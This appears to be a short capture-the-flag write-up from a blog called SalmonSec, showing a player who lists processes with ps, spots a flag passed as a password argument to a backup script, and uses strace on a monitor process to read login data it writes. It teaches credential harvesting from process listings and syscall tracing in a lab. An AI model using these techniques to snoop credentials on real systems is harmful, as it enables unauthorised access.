SalmonSec

Start Page Alright, let's get rolling here. I'm not alone eh... let's look at what's running again.

$ ps -aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0  37228  5304 ?        Ss   Jul07   0:45 /sbin/init
root        38  0.0  0.0  52032 15412 ?        Ss   Jul07  10:31 /lib/systemd/systemd-journald
root        84  0.0  0.0  28980  2924 ?        Ss   Jul07   0:02 /usr/sbin/cron -f
syslog      86  0.0  0.0 256392  4208 ?        Ssl  Jul07   2:11 /usr/sbin/rsyslogd -n
root       156  0.0  0.0  65508  6528 ?        Ss   Jul07   2:39 /usr/sbin/sshd -D
root       159  0.0  0.0   4504  1608 ?        S    Jul07   0:10 /bin/sh /root/files/backup.sh -u trinity -p Flag-7e0cfcf090a2fe53c97ea3edd3883d0d
root       172  0.0  0.0  15752  2212 pts/2    Ss+  Jul07   0:00 /sbin/agetty --noclear --keep-baud pts/2 115200 38400 9600 vt220
root       175  0.0  0.0  15752  2212 pts/0    Ss+  Jul07   0:00 /sbin/agetty --noclear --keep-baud pts/0 115200 38400 9600 vt220
root       176  0.0  0.0  15752  2212 ?        Ss+  Jul07   0:00 /sbin/agetty --noclear --keep-baud console 115200 38400 9600 vt220
root       177  0.0  0.0  15752  2212 pts/3    Ss+  Jul07   0:00 /sbin/agetty --noclear --keep-baud pts/3 115200 38400 9600 vt220
root       179  0.0  0.0  15752  2212 pts/1    Ss+  Jul07   0:00 /sbin/agetty --noclear --keep-baud pts/1 115200 38400 9600 vt220
mysql      182  0.0  0.2 1282828 190004 ?      Ssl  Jul07   3:56 /usr/sbin/mysqld
root     10146  0.0  0.0  90488  6840 ?        SNs  00:30   0:00 sshd: morpheus [priv]
morpheus 10157  0.0  0.0  90488  4292 ?        SN   00:31   0:00 sshd: morpheus@pts/4
morpheus 10158  0.0  0.0  21180  3736 pts/4    SNs  00:31   0:00 -bash
root     10181  0.0  0.0  49932  3416 pts/4    SN   00:31   0:00 su trinity
trinity  10185  0.0  0.0  21180  3740 pts/4    SN   00:31   0:00 bash
root     12416  0.0  0.0  49932  3416 pts/4    SN   00:58   0:00 su neo
neo      12420  0.0  0.0  21172  3516 pts/4    SN   00:58   0:00 bash
root     12439  0.0  0.0   7288   640 ?        S    00:59   0:00 sleep 10
root     12446  0.0  0.0  65508  6264 ?        Ss   00:59   0:00 sshd: [accepted]
root     12447  0.0  0.0  90340  6816 ?        Ss   00:59   0:00 sshd: unknown [priv]
sshd     12448  0.0  0.0  65508  3336 ?        S    00:59   0:00 sshd: [net]
sshd     12449  0.0  0.0  65508  3336 ?        S    00:59   0:00 sshd: unknown [net]
root     12450  0.0  0.0  65508  6264 ?        Ss   00:59   0:00 sshd: [accepted]
sshd     12451  0.0  0.0  65508  3336 ?        S    00:59   0:00 sshd: [net]
neo      12452  0.0  0.0  37364  3320 pts/4    RN+  00:59   0:00 ps -aux
root     30389  0.0  0.0  49932  3404 ?        SN   Jul13   0:00 su neo -c /bin/monitor
neo      30391  0.0  0.0   4216   612 ?        SNs  Jul13   0:00 /bin/monitor

I guess that elevated monitor service is pretty suspect... Let's inspect it shall we? Can we strace?

$ strace
strace: must have PROG [ARGS] or -p PID
Try 'strace -h' for more information.
$ strace 
$ strace 30391
strace: Can't stat '30391': No such file or directory
neo@lxc-sysadmin:/home/trinity$ strace -p 30391
strace: Process 30391 attached
restart_syscall(<... resuming interrupted nanosleep ...>) = 0
write(-1, "telnet 127.0.0.1 23\n", 20)  = -1 EBADF (Bad file descriptor)
write(-1, "user\n", 5)                  = -1 EBADF (Bad file descriptor)
write(-1, "FLAG-xxxx\n", 31) = -1 EBADF (Bad file descriptor)
write(-1, "get-cpuinfo\n", 12)          = -1 EBADF (Bad file descriptor)
nanosleep({10, 0},

Oh shit that was too easy!!